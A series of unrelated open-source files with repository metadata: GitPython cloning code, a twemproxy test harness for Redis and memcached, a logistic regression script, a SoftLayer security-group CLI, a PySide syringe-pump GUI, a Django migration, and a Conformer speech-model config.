# our git command could have a different working dir than our actual
# environment, hence we prepend its working dir if required
if not os.path.isabs(path) and git.working_dir:
path = join(git._working_dir, path)
# adjust remotes - there may be operating systems which use backslashes,
# These might be given as initial paths, but when handling the config file
# that contains the remote from which we were clones, git stops liking it
# as it will escape the backslashes. Hence we undo the escaping just to be
# sure
repo = cls(os.path.abspath(path), odbt = odbt)
if repo.remotes:
repo.remotes[0].config_writer.set_value('url', repo.remotes[0].url.replace("\\\\", "\\").replace("\\", "/"))
# END handle remote repo
return repo
def clone(self, path, progress=None, **kwargs):
"""Create a clone from this repository.
:param path:
is the full path of the new repo (traditionally ends with ./<name>.git).
:param progress: See 'git.remote.Remote.push'.
:param kwargs:
odbt = ObjectDatabase Type, allowing to determine the object database
implementation used by the returned Repo instance
All remaining keyword arguments are given to the git-clone command
:return: ``git.Repo`` (the newly cloned repo)"""
return self._clone(self.git, self.git_dir, path, type(self.odb), progress, **kwargs)
@classmethod
def clone_from(cls, url, to_path, progress=None, **kwargs):
"""Create a clone from the given URL
:param url: valid git url, see http://www.kernel.org/pub/software/scm/git/docs/git-clone.html#URLS
:param to_path: Path to which the repository should be cloned to
:param progress: See 'git.remote.Remote.push'.
:param kwargs: see the ``clone`` method
:return: Repo instance pointing to the cloned directory"""
return cls._clone(Git(os.getcwd()), url, to_path, GitCmdObjectDB, progress, **kwargs)
def archive(self, ostream, treeish=None, prefix=None, **kwargs):
"""Archive the tree at the given revision.
:parm ostream: file compatible stream object to which the archive will be written
:parm treeish: is the treeish name/id, defaults to active branch
:parm prefix: is the optional prefix to prepend to each filename in the archive
:parm kwargs:
Additional arguments passed to git-archive
NOTE: Use the 'format' argument to define the kind of format. Use
specialized ostreams to write any format supported by python
:raise GitCommandError: in case something went wrong
:return: self"""
if treeish is None:
treeish = self.head.commit
if prefix and 'prefix' not in kwargs:
kwargs['prefix'] = prefix
kwargs['output_stream'] = ostream
self.git.archive(treeish, **kwargs)
return self
rev_parse = rev_parse
def __repr__(self):
return '<git.Repo "%s">' % self.git_dir
| {
"content_hash": "01d3f57ae0adaf1d56e89d7604757469",
"timestamp": "",
"source": "github",
"line_count": 762,
"max_line_length": 144,
"avg_line_length": 32.351706036745405,
"alnum_prop": 0.6875709881551193,
"repo_name": "ArnoVanLumig/set-seminar",
"id": "8882f66455240c660fd9679f71349b65b1481ae1",
"size": "24869",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "git/repo/base.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "557283"
},
{
"name": "Ruby",
"bytes": "46005"
}
],
"symlink_target": ""
} |
import os
import sys
import socket
from utils import *
import conf
class Base:
'''
Sub class should implement:
_alive, _pre_deploy, status, and init self.args
'''
def __init__(self, name, host, port, path):
self.args = {
'name' : name,
'host' : host,
'port' : port,
'path' : path,
#startcmd and runcmd will used to generate the control script
#used for the start cmd
'startcmd' : '',
#process name you see in `ps -aux`, used this to generate stop cmd
'runcmd' : '',
'logfile' : '',
}
def __str__(self):
return TT('[$name:$host:$port]', self.args)
def deploy(self):
logging.info('deploy %s' % self)
self._run(TTCMD('mkdir -p $path/bin && \
mkdir -p $path/conf && \
mkdir -p $path/log && \
mkdir -p $path/data',
self.args))
self._pre_deploy()
self._gen_control_script()
def _gen_control_script(self):
content = file(os.path.join(WORKDIR, 'conf/control.sh')).read()
content = TT(content, self.args)
control_filename = TT('${path}/${name}_control', self.args)
fout = open(control_filename, 'w+')
fout.write(content)
fout.close()
os.chmod(control_filename, 0755)
def start(self):
if self._alive():
logging.warn('%s already running' %(self) )
return
logging.debug('starting %s' % self)
t1 = time.time()
sleeptime = .1
cmd = TT("cd $path && ./${name}_control start", self.args)
self._run(cmd)
while not self._alive():
lets_sleep(sleeptime)
if sleeptime < 5:
sleeptime *= 2
else:
sleeptime = 5
logging.warn('%s still not alive' % self)
t2 = time.time()
logging.info('%s start ok in %.2f seconds' %(self, t2-t1) )
def stop(self):
if not self._alive():
logging.warn('%s already stop' %(self) )
return
cmd = TT("cd $path && ./${name}_control stop", self.args)
self._run(cmd)
t1 = time.time()
while self._alive():
lets_sleep()
t2 = time.time()
logging.info('%s stop ok in %.2f seconds' %(self, t2-t1) )
def pid(self):
cmd = TT("pgrep -f '^$runcmd'", self.args)
return self._run(cmd)
def status(self):
logging.warn("status: not implement")
def _alive(self):
logging.warn("_alive: not implement")
def _run(self, raw_cmd):
ret = system(raw_cmd, logging.debug)
logging.debug('return : [%d] [%s] ' % (len(ret), shorten(ret)) )
return ret
def clean(self):
cmd = TT("rm -rf $path", self.args)
self._run(cmd)
def host(self):
return self.args['host']
def port(self):
return self.args['port']
class RedisServer(Base):
def __init__(self, host, port, path, cluster_name, server_name, auth = None):
Base.__init__(self, 'redis', host, port, path)
self.args['startcmd'] = TT('bin/redis-server conf/redis.conf', self.args)
self.args['runcmd'] = TT('redis-server \*:$port', self.args)
self.args['conf'] = TT('$path/conf/redis.conf', self.args)
self.args['pidfile'] = TT('$path/log/redis.pid', self.args)
self.args['logfile'] = TT('$path/log/redis.log', self.args)
self.args['dir'] = TT('$path/data', self.args)
self.args['REDIS_CLI'] = conf.BINARYS['REDIS_CLI']
self.args['cluster_name'] = cluster_name
self.args['server_name'] = server_name
self.args['auth'] = auth
def _info_dict(self):
cmd = TT('$REDIS_CLI -h $host -p $port INFO', self.args)
if self.args['auth']:
cmd = TT('$REDIS_CLI -h $host -p $port -a $auth INFO', self.args)
info = self._run(cmd)
info = [line.split(':', 1) for line in info.split('\r\n')
if not line.startswith('#')]
info = [i for i in info if len(i) > 1]
return defaultdict(str, info) #this is a defaultdict, be Notice
def _ping(self):
cmd = TT('$REDIS_CLI -h $host -p $port PING', self.args)
if self.args['auth']:
cmd = TT('$REDIS_CLI -h $host -p $port -a $auth PING', self.args)
return self._run(cmd)
def _alive(self):
return strstr(self._ping(), 'PONG')
def _gen_conf(self):
content = file(os.path.join(WORKDIR, 'conf/redis.conf')).read()
content = TT(content, self.args)
if self.args['auth']:
content += '\r\nrequirepass %s' % self.args['auth']
return content
def _pre_deploy(self):
self.args['BINS'] = conf.BINARYS['REDIS_SERVER_BINS']
self._run(TT('cp $BINS $path/bin/', self.args))
fout = open(TT('$path/conf/redis.conf', self.args), 'w+')
fout.write(self._gen_conf())
fout.close()
def status(self):
uptime = self._info_dict()['uptime_in_seconds']
if uptime:
logging.info('%s uptime %s seconds' % (self, uptime))
else:
logging.error('%s is down' % self)
def isslaveof(self, master_host, master_port):
info = self._info_dict()
if info['master_host'] == master_host and \
int(info['master_port']) == master_port:
logging.debug('already slave of %s:%s' % (master_host, master_port))
return True
def slaveof(self, master_host, master_port):
cmd = 'SLAVEOF %s %s' % (master_host, master_port)
return self.rediscmd(cmd)
def rediscmd(self, cmd):
args = copy.deepcopy(self.args)
args['cmd'] = cmd
cmd = TT('$REDIS_CLI -h $host -p $port $cmd', args)
logging.info('%s %s' % (self, cmd))
return self._run(cmd)
class Memcached(Base):
def __init__(self, host, port, path, cluster_name, server_name):
Base.__init__(self, 'memcached', host, port, path)
self.args['startcmd'] = TT('bin/memcached -u root -d -p $port', self.args)
self.args['runcmd'] = self.args['startcmd']
self.args['cluster_name'] = cluster_name
self.args['server_name'] = server_name
def _alive(self):
cmd = TT('echo "stats" | socat - TCP:$host:$port', self.args)
ret = self._run(cmd)
return strstr(ret, 'END')
def _pre_deploy(self):
self.args['BINS'] = conf.BINARYS['MEMCACHED_BINS']
self._run(TT('cp $BINS $path/bin/', self.args))
class NutCracker(Base):
def __init__(self, host, port, path, cluster_name, masters, mbuf=512,
verbose=5, is_redis=True, redis_auth=None):
Base.__init__(self, 'nutcracker', host, port, path)
self.masters = masters
self.args['mbuf'] = mbuf
self.args['verbose'] = verbose
self.args['redis_auth'] = redis_auth
self.args['conf'] = TT('$path/conf/nutcracker.conf', self.args)
self.args['pidfile'] = TT('$path/log/nutcracker.pid', self.args)
self.args['logfile'] = TT('$path/log/nutcracker.log', self.args)
self.args['status_port'] = self.args['port'] + 1000
self.args['startcmd'] = TTCMD('bin/nutcrackers -d -c $conf -o $logfile \
-p $pidfile -s $status_port \
-v $verbose -m $mbuf -i 1', self.args)
self.args['runcmd'] = TTCMD('bin/nutcrackers -d -c $conf -o $logfile \
-p $pidfile -s $status_port', self.args)
self.args['cluster_name']= cluster_name
self.args['is_redis']= str(is_redis).lower()
def _alive(self):
return self._info_dict()
def _gen_conf_section(self):
template = ' - $host:$port:1 $server_name'
cfg = '\n'.join([TT(template, master.args) for master in self.masters])
return cfg
def _gen_conf(self):
content = '''
$cluster_name:
listen: 0.0.0.0:$port
hash: fnv1a_64
distribution: modula
preconnect: true
auto_eject_hosts: false
redis: $is_redis
backlog: 512
timeout: 400
client_connections: 0
server_connections: 1
server_retry_timeout: 2000
server_failure_limit: 2
servers:
'''
if self.args['redis_auth']:
content = content.replace('redis: $is_redis',
'redis: $is_redis\r\n redis_auth: $redis_auth')
content = TT(content, self.args)
return content + self._gen_conf_section()
def _pre_deploy(self):
self.args['BINS'] = conf.BINARYS['NUTCRACKER_BINS']
self._run(TT('cp $BINS $path/bin/', self.args))
fout = open(TT('$path/conf/nutcracker.conf', self.args), 'w+')
fout.write(self._gen_conf())
fout.close()
def version(self):
#This is nutcracker-0.4.0
s = self._run(TT('$BINS --version', self.args))
return s.strip().replace('This is nutcracker-', '')
def _info_dict(self):
try:
sock=socket.socket()
sock.connect((self.args['host'], self.args['status_port']))
sock.send('status\r\n')
ret=sock.recv(10000)
sock.close()
return json_decode(ret)
except Exception, e:
logging.debug('can not get _info_dict of nutcracker, \
[Exception: %s]' % (e, ))
return None
def reconfig(self, masters):
self.masters = masters
self.stop()
self.deploy()
self.start()
logging.info('proxy %s:%s is updated' % (self.args['host'], self.args['port']))
def logfile(self):
return self.args['logfile']
def cleanlog(self):
cmd = TT("rm '$logfile'", self.args)
self._run(cmd)
def signal(self, signo):
self.args['signo'] = signo
cmd = TT("pkill -$signo -f '^$runcmd'", self.args)
self._run(cmd)
def reload(self):
self.signal('USR1')
def set_config(self, content):
fout = open(TT('$path/conf/nutcracker.conf', self.args), 'w+')
fout.write(content)
fout.close()
self.reload()
| {
"content_hash": "f2058c8ec02d9b01e59973cb38bd4ba2",
"timestamp": "",
"source": "github",
"line_count": 319,
"max_line_length": 87,
"avg_line_length": 32.58307210031348,
"alnum_prop": 0.5299211083317299,
"repo_name": "vipshop/twemproxies",
"id": "8771dc96ceeed63d765c20fb06566441e03d1c44",
"size": "10505",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/lib/server_modules.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "646969"
},
{
"name": "C++",
"bytes": "8390"
},
{
"name": "M4",
"bytes": "6440"
},
{
"name": "Makefile",
"bytes": "3042"
},
{
"name": "Python",
"bytes": "43478"
},
{
"name": "Shell",
"bytes": "59512"
}
],
"symlink_target": ""
} |
'''
Created on Oct 27, 2015
Logistic Regression Working Module
@author: Gu
'''
from numpy import *
def loadDataSet():
dataMat = []; labelMat = []
fr = open('testSet.txt')
for line in fr.readlines():
lineArr = line.strip().split()
dataMat.append([1.0, float(lineArr[0]), float(lineArr[1])])
labelMat.append(int(lineArr[2]))
return dataMat,labelMat
def sigmoid(inX):
return 1.0/(1+exp(-inX))
def gradAscent(dataMatIn, classLabels):
dataMatrix = mat(dataMatIn) #convert to NumPy matrix
labelMat = mat(classLabels).transpose() #convert to NumPy matrix
m,n = shape(dataMatrix)
alpha = 0.001
maxCycles = 500
weights = ones((n,1))
for k in range(maxCycles): #heavy on matrix operations
h = sigmoid(dataMatrix*weights) #matrix mult
error = (labelMat - h) #vector subtraction
weights = weights + alpha * dataMatrix.transpose()* error #matrix mult
return weights
def plotBestFit(weights):
import matplotlib.pyplot as plt
dataMat,labelMat=loadDataSet()
dataArr = array(dataMat)
n = shape(dataArr)[0]
xcord1 = []; ycord1 = []
xcord2 = []; ycord2 = []
for i in range(n):
if int(labelMat[i])== 1:
xcord1.append(dataArr[i,1]); ycord1.append(dataArr[i,2])
else:
xcord2.append(dataArr[i,1]); ycord2.append(dataArr[i,2])
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(xcord1, ycord1, s=30, c='red', marker='s')
ax.scatter(xcord2, ycord2, s=30, c='green')
x = arange(-3.0, 3.0, 0.1)
y = (-weights[0]-weights[1]*x)/weights[2]
ax.plot(x, y)
plt.xlabel('X1'); plt.ylabel('X2');
plt.show()
def stocGradAscent0(dataMatrix, classLabels):
m,n = shape(dataMatrix)
alpha = 0.01
weights = ones(n) #initialize to all ones
for i in range(m):
h = sigmoid(sum(dataMatrix[i]*weights))
error = classLabels[i] - h
weights = weights + alpha * error * dataMatrix[i]
return weights
def stocGradAscent1(dataMatrix, classLabels, numIter=150):
m,n = shape(dataMatrix)
weights = ones(n) #initialize to all ones
for j in range(numIter):
dataIndex = range(m)
for i in range(m):
alpha = 4/(1.0+j+i)+0.0001 #apha decreases with iteration, does not
randIndex = int(random.uniform(0,len(dataIndex)))#go to 0 because of the constant
h = sigmoid(sum(dataMatrix[randIndex]*weights))
error = classLabels[randIndex] - h
weights = weights + alpha * error * dataMatrix[randIndex]
del(dataIndex[randIndex])
return weights
def classifyVector(inX, weights):
prob = sigmoid(sum(inX*weights))
if prob > 0.5: return 1.0
else: return 0.0
def colicTest():
frTrain = open('horseColicTraining.txt'); frTest = open('horseColicTest.txt')
trainingSet = []; trainingLabels = []
for line in frTrain.readlines():
currLine = line.strip().split('\t')
lineArr =[]
for i in range(21):
lineArr.append(float(currLine[i]))
trainingSet.append(lineArr)
trainingLabels.append(float(currLine[21]))
trainWeights = stocGradAscent1(array(trainingSet), trainingLabels, 1000)
errorCount = 0; numTestVec = 0.0
for line in frTest.readlines():
numTestVec += 1.0
currLine = line.strip().split('\t')
lineArr =[]
for i in range(21):
lineArr.append(float(currLine[i]))
if int(classifyVector(array(lineArr), trainWeights))!= int(currLine[21]):
errorCount += 1
errorRate = (float(errorCount)/numTestVec)
print ("the error rate of this test is: %f" % errorRate)
return errorRate
def multiTest():
numTests = 10; errorSum=0.0
for k in range(numTests):
errorSum += colicTest()
print ("after %d iterations the average error rate is: %f" % (numTests, errorSum/float(numTests)))
weights=ones((3,1))
print(weights)
| {
"content_hash": "36743bf2ee1a5f151926206ec8fa01dc",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 102,
"avg_line_length": 34.93043478260869,
"alnum_prop": 0.6163803833706746,
"repo_name": "nicepear/machine-learning",
"id": "bfc79b975ad61c333078d17afe085f6d94547a86",
"size": "4017",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "logRegres.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8105"
}
],
"symlink_target": ""
} |
"""Manage security group rules."""
# :license: MIT, see LICENSE for more details.
import click
import SoftLayer
from SoftLayer.CLI import environment
from SoftLayer.CLI import exceptions
from SoftLayer.CLI import formatting
COLUMNS = ['id',
'remoteIp',
'remoteGroupId',
'direction',
'ethertype',
'portRangeMin',
'portRangeMax',
'protocol',
'createDate',
'modifyDate']
REQUEST_BOOL_COLUMNS = ['requestId', 'response']
REQUEST_RULES_COLUMNS = ['requestId', 'rules']
@click.command()
@click.argument('securitygroup_id')
@click.option('--sortby',
help='Column to sort by',
type=click.Choice(COLUMNS))
@environment.pass_env
def rule_list(env, securitygroup_id, sortby):
"""List security group rules."""
mgr = SoftLayer.NetworkManager(env.client)
table = formatting.Table(COLUMNS)
table.sortby = sortby
rules = mgr.list_securitygroup_rules(securitygroup_id)
for rule in rules:
port_min = rule.get('portRangeMin')
port_max = rule.get('portRangeMax')
if port_min is None:
port_min = formatting.blank()
if port_max is None:
port_max = formatting.blank()
table.add_row([
rule['id'],
rule.get('remoteIp') or formatting.blank(),
rule.get('remoteGroupId') or formatting.blank(),
rule['direction'],
rule.get('ethertype') or formatting.blank(),
port_min,
port_max,
rule.get('protocol') or formatting.blank(),
rule.get('createDate') or formatting.blank(),
rule.get('modifyDate') or formatting.blank()
])
env.fout(table)
@click.command()
@click.argument('securitygroup_id')
@click.option('--remote-ip', '-r',
help='The remote IP/CIDR to enforce')
@click.option('--remote-group', '-s', type=click.INT,
help='The ID of the remote security group to enforce')
@click.option('--direction', '-d',
help=('The direction of traffic to enforce '
'(ingress, egress)'))
@click.option('--ethertype', '-e',
help='The ethertype (IPv4 or IPv6) to enforce')
@click.option('--port-max', '-M', type=click.INT,
help=('The upper port bound to enforce. When the protocol is ICMP, '
'this specifies the ICMP code to permit'))
@click.option('--port-min', '-m', type=click.INT,
help=('The lower port bound to enforce. When the protocol is ICMP, '
'this specifies the ICMP type to permit'))
@click.option('--protocol', '-p',
help='The protocol (icmp, tcp, udp) to enforce')
@environment.pass_env
def add(env, securitygroup_id, remote_ip, remote_group,
direction, ethertype, port_max, port_min, protocol):
"""Add a security group rule to a security group.
\b
Examples:
# Add an SSH rule (TCP port 22) to a security group
slcli sg rule-add 384727 \\
--direction ingress \\
--protocol tcp \\
--port-min 22 \\
--port-max 22
\b
# Add a ping rule (ICMP type 8 code 0) to a security group
slcli sg rule-add 384727 \\
--direction ingress \\
--protocol icmp \\
--port-min 8 \\
--port-max 0
"""
mgr = SoftLayer.NetworkManager(env.client)
ret = mgr.add_securitygroup_rule(securitygroup_id, remote_ip, remote_group,
direction, ethertype, port_max,
port_min, protocol)
if not ret:
raise exceptions.CLIAbort("Failed to add security group rule")
table = formatting.Table(REQUEST_RULES_COLUMNS)
table.add_row([ret['requestId'], str(ret['rules'])])
env.fout(table)
@click.command()
@click.argument('securitygroup_id')
@click.argument('rule_id')
@click.option('--remote-ip', '-r',
help='The remote IP/CIDR to enforce')
@click.option('--remote-group', '-s',
help='The ID of the remote security group to enforce')
@click.option('--direction', '-d',
help='The direction of traffic to enforce')
@click.option('--ethertype', '-e',
help='The ethertype (IPv4 or IPv6) to enforce')
@click.option('--port-max', '-M',
help='The upper port bound to enforce')
@click.option('--port-min', '-m',
help='The lower port bound to enforce')
@click.option('--protocol', '-p',
help='The protocol (icmp, tcp, udp) to enforce')
@environment.pass_env
def edit(env, securitygroup_id, rule_id, remote_ip, remote_group,
direction, ethertype, port_max, port_min, protocol):
"""Edit a security group rule in a security group."""
mgr = SoftLayer.NetworkManager(env.client)
data = {}
if remote_ip:
data['remote_ip'] = remote_ip
if remote_group:
data['remote_group'] = remote_group
if direction:
data['direction'] = direction
if ethertype:
data['ethertype'] = ethertype
if port_max is not None:
data['port_max'] = port_max
if port_min is not None:
data['port_min'] = port_min
if protocol:
data['protocol'] = protocol
ret = mgr.edit_securitygroup_rule(securitygroup_id, rule_id, **data)
if not ret:
raise exceptions.CLIAbort("Failed to edit security group rule")
table = formatting.Table(REQUEST_BOOL_COLUMNS)
table.add_row([ret['requestId']])
env.fout(table)
@click.command()
@click.argument('securitygroup_id')
@click.argument('rule_id')
@environment.pass_env
def remove(env, securitygroup_id, rule_id):
"""Remove a rule from a security group."""
mgr = SoftLayer.NetworkManager(env.client)
ret = mgr.remove_securitygroup_rule(securitygroup_id, rule_id)
if not ret:
raise exceptions.CLIAbort("Failed to remove security group rule")
table = formatting.Table(REQUEST_BOOL_COLUMNS)
table.add_row([ret['requestId']])
env.fout(table)
| {
"content_hash": "92fc2990e39077d3a39db016a5e7feb2",
"timestamp": "",
"source": "github",
"line_count": 187,
"max_line_length": 82,
"avg_line_length": 32.63101604278075,
"alnum_prop": 0.5981645362176335,
"repo_name": "kyubifire/softlayer-python",
"id": "6d6c33c62bcfb997c28d2882a7b66cef9a39d26d",
"size": "6102",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SoftLayer/CLI/securitygroup/rule.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "DIGITAL Command Language",
"bytes": "854"
},
{
"name": "Makefile",
"bytes": "7458"
},
{
"name": "Python",
"bytes": "1957876"
}
],
"symlink_target": ""
} |
"""
Python Implementation for the Cavro XP3000 GUI.
The GUI is designed with regards to the MVC (Model View Controller)
Ui architectural pattern. Inside this module the View - Controller behaviors
are implemented while the Model behavior is implemented in the imported module:
pump_model.py
"""
# Sat May 24 10:57:50 EEST 2014, nickkouk
# proper division for python 2.7
from __future__ import division
# Usual importing stuff
from PySide.QtGui import *
from PySide.QtCore import *
# Module imports
import sys
import python_gui # Designer outcome
import python_settings
import serial
import time
__appname__ = "XP3000 Interface"
# pump_oriented settings
addr = '/1'
term = 'R\r'
class MainWindow(QMainWindow, python_gui.Ui_MainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.setupUi(self)
self.setWindowTitle(__appname__)
# Connection settings
self.port_name = 'loop://'
self.baud = 9600
self.byte_size = 8
self.par = 'N'
self.stopb = 1
self.timeout_time = 0
self.addr = addr
self.term = term
self.ser = serial.serial_for_url(self.port_name, timeout = self.timeout_time)
#self.ser.open()
# Threading for non-blocking behavior
self.updateThread = updateThread(self)
self.updateThread.start()
# TODO Pump settings
self.plung_pos = 0
self.valve_pos = 'O'
self.plung_speed = 1
self.syr_size = 50 # The size of the syringe is 50 micro litre
self.steps_tot = 3000
self.valve_pos = '0'
# Connecting signals to functions
self.connect(self.output_btn, SIGNAL("clicked()"), self.output_fun)
self.connect(self.input_btn, SIGNAL("clicked()"), self.input_fun)
self.connect(self.bypass_btn, SIGNAL("clicked()"), self.bypass_fun)
self.connect(self.speed_slider, SIGNAL("sliderReleased()"), self.setSpeed)
self.connect(self.speed_spinbox, SIGNAL("editingFinished()"), self.setSpeed)
self.connect(self.volume_prompt, SIGNAL("returnPressed()"), self.volume_command)
self.connect(self.actionReports, SIGNAL("triggered()"), self.reportsThread_start)
# Action Signals - Slots
self.connect(self.actionNew_Device, SIGNAL("triggered()"), self.newDev)
#self.connect(self.actionReports, SIGNAL("triggered()"), self.reports_dialog)
self.status = {}
def reportsThread_start(self):
self.reportsThread = reportsThread(self.status)
self.reportsThread.start()
reports = Reports_class()
reports.exec_()
def close_window(self):
pass
def open_btn(self):
pass
def save_btn(self):
pass
def newDev(self):
#TODO have to fix the device search filter
QMessageBox.information(self, "New Pump Configuration", "Select the device name")
# Platform specific
if sys.platform[:3] == 'win':
dir = '.' # Windows device path?!
if sys.platform[:3] == 'dar':
dir = '~/src/python' # Should include this for compatibility issues
else:
dir = '.'
fileObj = QFileDialog.getOpenFileName(self, "New Pump Configuration", dir=dir)
if fileObj[0]:
self.ser.port_name = fileObj[0]
def update_values(self):
"""
The purpose of this function is to constantly update the settings
related to the pump, should be run by a thread periodically
"""
# keep the gathering info
status = {"abs_pos": '', "top_vel": '', "cutoff": '',\
"act_pos": '', "start": '', "backlash": '', "fluid": '',\
"buffer": '', "version": '', "checksum": ''}
# reading info mechanism
self.ser.write(self.addr + '?' + self.term)
status["abs_pos"] = self.ser.read(8)
self.ser.write(self.addr + '?1' + self.term)
status["start"] = self.ser.read(8)
self.ser.write(self.addr + '?2' + self.term)
status["top_vel"] = self.ser.read(8)
self.ser.write(self.addr + '?3' + self.term)
status["cutoff"] = self.ser.read(8)
self.ser.write(self.addr + '?4' + self.term)
status["act_pos"] = self.ser.read(8)
self.ser.write(self.addr + '?12' + self.term)
status["backlash"] = self.ser.read(8)
self.ser.write(self.addr + '?22' + self.term)
status["fluid"] = self.ser.read(8)
self.ser.write(self.addr + 'F' + self.term)
status["buffer"] = self.ser.read(8)
self.ser.write(self.addr + '&' + self.term)
status["version"] = self.ser.read(8)
self.ser.write(self.addr + '#' + self.term)
status["checksum"] = self.ser.read(8)
self.status = status
def volume_command(self):
"""
This function calculates the steps needed to deliver the volume,
checks if it can be delivered and updates the plunger position and
down_remaining steps
"""
vol = self.volume_prompt.text()
if not vol.isdigit():
QMessageBox.warning(self, __appname__, "Please enter a numerical value")
self.volume_prompt.selectAll()
return
vol = float(vol)
steps = self.steps_tot / self.syr_size * vol
if self.PushBtn.isChecked():
if self.plung_pos - steps < 1:# Check for validity of the command
QMessageBox.warning(self,__appname__, "Not a valid value")
self.volume_prompt.selectAll()
return
else:
self.plung_pos -= steps
#self.ser.write(self.addr + 'D' + steps + self.term)
else:
if self.plung_pos + steps > self.steps_tot:
# print "plunge position: {}".format(self.plung_pos)
#print "steps: {}".format(steps)
# print "steps_total: {}".format(self.steps_tot)
QMessageBox.warning(self, __appname__, "Exceeds the available space")
self.volume_prompt.selectAll()
return
else:
self.plung_pos += steps
#self.ser.write(self.addr + 'P' + steps + self.term)
print "Plunger Position: {}".format(self.plung_pos)
class updateThread(QThread):
def __init__(self, window, parent=None):
super(updateThread, self).__init__(parent)
self.window = window
def run(self):
#status = self.update_values()
while True:
self.window.update_values()
time.sleep(1)
class reportsThread(QThread):
def __init__(self, status, parent=None):
super(reportsThread, self).__init__(parent)
self.status = status
def run(self):
#self.reports.Position_Edit.setText(self.status["abs_pos"])
#self.reports.Top_Velocity_Edit.setText(self.status["top_vel"])
#self.reports.Cutoff_Velocity_Edit.setText(self.status["cutoff"])
#self.reports.Actual_Position_Edit.setText(self.status["act_pos"])
#self.reports.Start_Velocity_Edit.setText(self.status["start"])
#self.reports.Backlash_Edit.setText(self.status["backlash"])
#self.reports.Fluid_Sensor_Edit.setText(self.status["fluid"])
#self.reports.Buffer_Status_Edit.setText(self.status["buffer"])
#self.reports.Firmware_Edit.setText(self.status["version"])
#self.reports.Checksm_Edit.setText(self.status["checksum"])
pass
class Reports_class(QDialog, python_settings.Ui_Dialog):
def __init__(self, parent=None):
super(Reports_class, self).__init__(parent)
self.setupUi(self)
__appname__ = "Reports Screen"
self.setWindowTitle(__appname__)
if __name__ == '__main__':
app = QApplication(sys.argv)
window= MainWindow()
window.show()
app.exec_() # Event-loop of the application
| {
"content_hash": "ae09e0b8a4f591ff2bdf3ce4092f765f",
"timestamp": "",
"source": "github",
"line_count": 233,
"max_line_length": 89,
"avg_line_length": 34.23175965665236,
"alnum_prop": 0.5962888665997994,
"repo_name": "bergercookie/Pump3000",
"id": "9a18bfcaaac8ab72ad37e8d1d992dbd58cb152d0",
"size": "7999",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "for_keep/python_work.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "16424"
},
{
"name": "JavaScript",
"bytes": "54587"
},
{
"name": "Makefile",
"bytes": "8885"
},
{
"name": "Python",
"bytes": "240687"
},
{
"name": "Shell",
"bytes": "7265"
},
{
"name": "TeX",
"bytes": "93674"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('councilmatic_core', '0012_auto_20161012_1218'),
]
operations = [
migrations.AlterField(
model_name='organization',
name='source_url',
field=models.CharField(blank=True, max_length=255, null=True),
),
]
| {
"content_hash": "887780acdd40b95eaf88119183554203",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 74,
"avg_line_length": 23.444444444444443,
"alnum_prop": 0.6137440758293838,
"repo_name": "datamade/django-councilmatic",
"id": "258843f4776a650eb3e9bdf6318977a5570de31a",
"size": "494",
"binary": false,
"copies": "1",
"ref": "refs/heads/2.5",
"path": "councilmatic_core/migrations/0013_auto_20161012_1414.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "73072"
},
{
"name": "HTML",
"bytes": "164464"
},
{
"name": "Java",
"bytes": "504830"
},
{
"name": "JavaScript",
"bytes": "78854"
},
{
"name": "Python",
"bytes": "202625"
}
],
"symlink_target": ""
} |
r"""Conformer.
This model uses a conformer network to convert speech to text.
paper : https://arxiv.org/abs/2005.08100
high-level overview of Conformer encoder layer.
x = x + 0.5 * FeedForward(x)
x = x + MHSA(x)
x = x + ConvolutionBlock(x)
x = x + 0.5 * FeedForward(x)
y = layer_norm(x)
"""
import math
from typing import Any, List
from flax import linen as nn
from flax import struct
from init2winit.model_lib import base_model
from init2winit.model_lib import librispeech_preprocessor as preprocessor
from init2winit.model_lib import lingvo_attention
from init2winit.model_lib import spectrum_augmenter
import jax
import jax.numpy as jnp
from ml_collections.config_dict import config_dict
import numpy as np
DEFAULT_HPARAMS = config_dict.ConfigDict(
dict(
activation_function='relu',
optimizer='adam',
opt_hparams={
'beta1': .9,
'beta2': .98,
'epsilon': 1e-9,
'weight_decay': 0.0
},
lr_hparams={
'base_lr': 0.1,
'schedule': 'constant'
},
batch_size=256,
eval_batch_size=128,
l2_decay_factor=1e-6,
l2_decay_rank_threshold=0,
use_shallue_label_smoothing=False,
rng_seed=-1,
model_dtype='float32',
grad_clip=5.0,
encoder_dim=512,
num_attention_heads=8,
num_encoder_layers=16,
convolution_kernel_size=5,
freq_mask_count=2,
freq_mask_max_bins=27,
time_mask_count=10,
time_mask_max_frames=40,
time_mask_max_ratio=0.05,
time_masks_per_frame=0.0,
use_dynamic_time_mask_max_frames=True,
use_specaug=True,
residual_dropout_rate=0.1,
input_dropout_rate=0.1,
enable_decoder_pre_layer_norm=True,
enable_conformer_post_layer_norm=True,
use_lingvo_attention=False,
total_accumulated_batch_size=None,))
@struct.dataclass
class ConformerConfig:
"""Global hyperparameters used to minimize obnoxious kwarg plumbing."""
vocab_size: int = 0
dtype: Any = jnp.float32
encoder_dim: int = 0
num_attention_heads: int = 0
num_encoder_layers: int = 0
attention_dropout_rate: float = 0.0
attention_residual_dropout_rate: float = 0.1
input_dropout_rate: float = 0.0
conv_residual_dropout_rate: float = 0.0
feed_forward_dropout_rate: float = 0.0
feed_forward_residual_dropout_rate: float = 0.1
convolution_kernel_size: int = 5
feed_forward_expansion_factor: int = 4
conv_expansion_factor: int = 2
conv_subsampling_factor: int = 2
conv_subsampling_layers: int = 2
train: bool = False
use_specaug: bool = False
